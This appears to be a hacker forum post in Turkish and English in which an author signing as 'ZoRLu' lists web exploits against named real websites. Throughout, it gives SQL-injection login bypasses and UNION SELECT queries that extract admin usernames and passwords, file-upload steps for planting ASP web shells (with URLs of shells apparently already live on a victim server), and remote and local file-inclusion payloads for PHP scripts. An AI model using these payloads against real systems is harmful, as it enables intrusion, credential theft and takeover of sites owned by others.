
bi tarayım dedim neler yokki :D hani açık yoktu a.q en basidi rfi aha bakın sizde görün :D

yani işin özü siz milletin ne dediğini siktir edin eşeğinizi sağlam kazığa bağlayın tarayın mevcut scriptleri kullanmadan önce ;)
"Şeytan İçinde ki Sestir; O Sese Kulak Ver"-Zorlu BUĞRAHAN-


Discovered By: ZoRLu
for demo:
username: logoz ' or '
pass: dont write anything
http://www.riotpix.com/board/
E-Learning Portal Remote File Upload
link 1: http://www.exploiter5.com/all.php?id=47
link 2: http://packetstormsecurity.org/0812-exploits/elearning-upload.txt
Discovered By: ZoRLu
exp:
http://www.preprojects.com/elearning/uploaded/your_shell.asp
you register to site
login this site
after upload you_shell.asp
exp for demo:
register:
http://www.preprojects.com/elearning/new_student.asp
login:
role: select STUDENT
user: zorlu
passwd: zorlu1
shell
http://www.preprojects.com/elearning/uploaded/zehir4.asp ( Sizce Hack Benim Umrumda mI ? :S )
server daki siteler:
http://www.preprojects.com/elearning/uploaded/zehir4.asp?status=2&Time=3%3A04%3A29+AM&Path=c%3A%5Cinetpub%5Cwwwroot%5Chostnomi%5C&submit1=Git
buda golden gate:
http://www.preprojects.com/elearning/uploaded/zehir4.asp?status=2&Path=c:\inetpub\wwwroot\hostnomi\/adminpgg/pgg.ae&Time=3:19:20%20AM
link: http://www.milw0rm.com/exploits/7494
link: http://packetstormsecurity.org/0812-exploits/zelta-rfusql.txt
Discovered By: ZoRLu
exp for demo: (R-SQL)
user: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminlogin,3,4+from+admin
pass: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminpass,3,4+from+admin
exp for demo: (B-SQL)
http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=1 (true)
http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=100 (false)
exp for demo: (auth bypass)
http://joineazy.com/members/login.asp
username: trt-turk@hotmail.com
pass: ' or '
exp for demo: (admin bypass)
http://joineazy.com/embadmin/admin_main.asp
http://joineazy.com/embadmin/site_setup.asp
http://joineazy.com/embadmin/main_baseimage.asp
exp for demo: (RFU)
firs you register to site
login to site and edit your pictures select your shell.asp
go your shell asp:
http://joineazy.com/members/member_pictures/shell.asp
link: http://www.milw0rm.com/exploits/7392
Discovered By: ZoRLu
file:
_conf/core/common-tpl-vars.php
c0de:
require($confdir.'lang/langpack.'.$lang.'.php'); ( line 23 )
rfi:
http://www.z0rlu.blogspot.com/script/_conf/core/common-tpl-vars.php?confdir=ZoRLu.txt?
lfi:
http://www.z0rlu.blogspot.com/script/_conf/core/common-tpl-vars.php?lang=[LFi]
Discovered By: ZoRLu
file:
include/header.php
exp:
http://localhost/script/include/header.php?config_path=ZoRLu.txt?